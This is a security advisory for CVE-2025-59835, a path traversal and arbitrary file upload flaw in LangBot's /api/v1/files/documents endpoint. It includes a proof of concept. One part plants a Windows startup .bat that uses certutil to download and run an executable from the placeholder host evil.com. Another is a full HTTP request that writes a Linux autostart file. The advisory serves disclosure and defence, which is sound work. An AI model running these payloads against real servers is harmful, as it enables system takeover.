
LangBot has a cross-directory file upload vulnerability, which could potentially lead to system takeover

Moderate
RockChinQ published GHSA-7j3j-qj83-9qv4 Oct 2, 2025

Package

LangBot (Python)

Affected versions

4.1.0~4.2.2

Patched versions

None

Description

LangBot has a cross-directory file upload vulnerability, which could potentially lead to system takeover.

Summary

  • After logging into the LangBot system, an attacker can exploit the /api/v1/files/documents interface to perform arbitrary file uploads. Since this interface does not strictly restrict the storage directory of files on the server, it is possible to upload dangerous files to specific system directories.
  • For example, an attacker could upload SSH private keys or crontab configuration files on Linux systems, or malicious batch scripts to the Windows startup directory. These hazardous operations could potentially result in the server being taken over by the attacker.

Details

  • The LangBot system has an interface /api/v1/files/documents that allows users to upload documents. This interface directly parses the name of the uploaded file and uses os.path.join to concatenate it with the data/storage directory, ultimately completing the content write operation.
  • However, there are certain limitations. Since the filename is split by "." into an array, the program only takes the parts at index 0 and -1 as the filename and extension, respectively, and concatenates an 8-character random string in between. This makes it impossible to use "../" for directory traversal.

  • However, Python's os.path.join has a behaviour that permits directory traversal without any "../" sequence: the uploaded filename can simply be an absolute path. See the following example.

  • When the second parameter of os.path.join is an absolute path, the preceding parameter is ignored.
import os
path_base = os.path.join("web","upload")
path_two = "/tmp/test.txt"
print(os.path.join(path_base, path_two))

# /tmp/test.txt
  • If an attacker uploads a file with a specially crafted filename, it may be possible to upload the file to a directory outside of data/storage.

Windows

  • Such as C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.
  • Construct and send the data packet. It can be observed that the malicious .bat file has been written to the startup directory. Simply restart the Windows system to execute it.

Linux

  • On Linux systems, the filename restrictions rule out certain dangerous directories such as /etc/cron.d and ~/.ssh, because their absolute paths contain a "." that the split would consume. Any alternative directory must have an absolute path with no "." in it and must execute or process its contents automatically or conditionally, even though the attacker does not fully control the final filename.

  • Based on my knowledge, I have only found two directories that may partially meet the requirements: /etc/systemd/system and /etc/xdg/autostart. The former requires manual enabling by the user, which is clearly unreasonable. In contrast, the latter requires the target server to be a desktop edition, a condition that is relatively more acceptable.


Remediation Recommendations

  • Take only the file name itself and strip special characters (e.g., /, \, ., etc.) before building the storage path, or URL-encode the name with quote so that separators can no longer act as path components.

PoC

......
Content-Disposition: form-data; name="file"; filename="C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\evil.bat"

certutil -urlcache -split -f http://evil.com/evil.exe C:\Windows\Temp\evil.exe
......

Data packet

POST /api/v1/files/documents HTTP/1.1
Host: 192.168.195.150:5300
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWFhQGFhLmNvbSIsImlzcyI6IkxhbmdCb3QtY29tbXVuaXR5IiwiZXhwIjoxNzU3NzE2MTYxfQ.PCcPGo8dflzUnsccbvm30G2ww9qXdt31CMPz_CHMMFQ
Origin: http://192.168.1.105:5300
Sec-GPC: 1
Connection: close
Referer: http://192.168.1.105:5300/home/models
Priority: u=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytewrOVXbsOVk3wBO
Content-Length: 198

------WebKitFormBoundarytewrOVXbsOVk3wBO
Content-Disposition: form-data; name="file"; filename=" /etc/xdg/autostart/auto.desktop"

touch /tmp/success
------WebKitFormBoundarytewrOVXbsOVk3wBO--

Impact

  • Users of the LangBot system running versions 4.1.0 through the latest (4.2.2), whose backend is reachable by attackers or protected only by weak passwords, may be at risk.

Severity

Moderate

CVE ID

CVE-2025-59835

Weaknesses

Relative Path Traversal

The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as .. that can resolve to a location that is outside of that directory. Learn more on MITRE.

Unrestricted Upload of File with Dangerous Type

The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Learn more on MITRE.

Credits